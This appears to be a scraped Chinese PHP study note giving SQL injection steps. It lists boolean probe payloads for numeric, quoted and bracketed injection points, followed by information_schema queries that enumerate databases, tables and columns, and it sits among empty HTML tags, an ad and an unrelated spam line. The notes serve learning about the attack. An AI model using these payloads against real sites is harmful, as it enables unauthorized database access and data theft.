步驟 · PHP筆記 · 看云

<ruby id="bdb3f"></ruby>

<p id="bdb3f"><cite id="bdb3f"></cite></p>

<p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>

<p id="bdb3f"><cite id="bdb3f"></cite></p>

<pre id="bdb3f"></pre>

<pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

<ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
<pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre>

<output id="bdb3f"></output><p id="bdb3f"></p>

<pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

<ruby id="bdb3f"></ruby>

??碼云GVP開源項目 12k star Uniapp+ElementUI 功能強大支持多語言、二開方便！廣告

## **測試注入點是否存在** **1、id = 1 異常** ``` id = 1 and 1 =1 -- + 正確 id = 1 and 1=2 -- + 錯誤 ``` 結論：極有可能存在數字型SQL注入 ps:單引號有個特殊的作用：命令分隔符 **2、id = 1' 異常** ``` id = 1' and 1 =1 -- + 正確 id = 1' and 1=2 -- + 錯誤 ``` 結論：極有可能存在單引號字符型SQL注入 **3、id = 1" 異常** ``` id = 1" and 1 =1 -- + 正確 id = 1" and 1=2 -- + 錯誤 ``` 結論：極有可能存在雙引號字符型SQL注入 **4、id = 1) 異常** ``` id = 1) and 1 =1 -- + 正確 id = 1) and 1=2 -- + 錯誤 ``` 結論：極有可能存在括號數字型SQL注入 ## **猜數據庫** ``` select schema_name from information_schema.schemata ``` ## **猜某庫的數據表** ``` select table_name from information_schema.tables where table_schema=’xxxxx’ ``` ## **猜某表的所有列** ``` Select column_name from information_schema.columns where table_name=’xxxxx’ ``` ## **獲取某列的內容** ``` Select *** from **** ```

<ruby id="bdb3f"></ruby>

<p id="bdb3f"><cite id="bdb3f"></cite></p>

<p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>

<p id="bdb3f"><cite id="bdb3f"></cite></p>

<pre id="bdb3f"></pre>

<pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

<ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
<pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre>

<output id="bdb3f"></output><p id="bdb3f"></p>

<pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

<ruby id="bdb3f"></ruby>

哎呀哎呀视频在线观看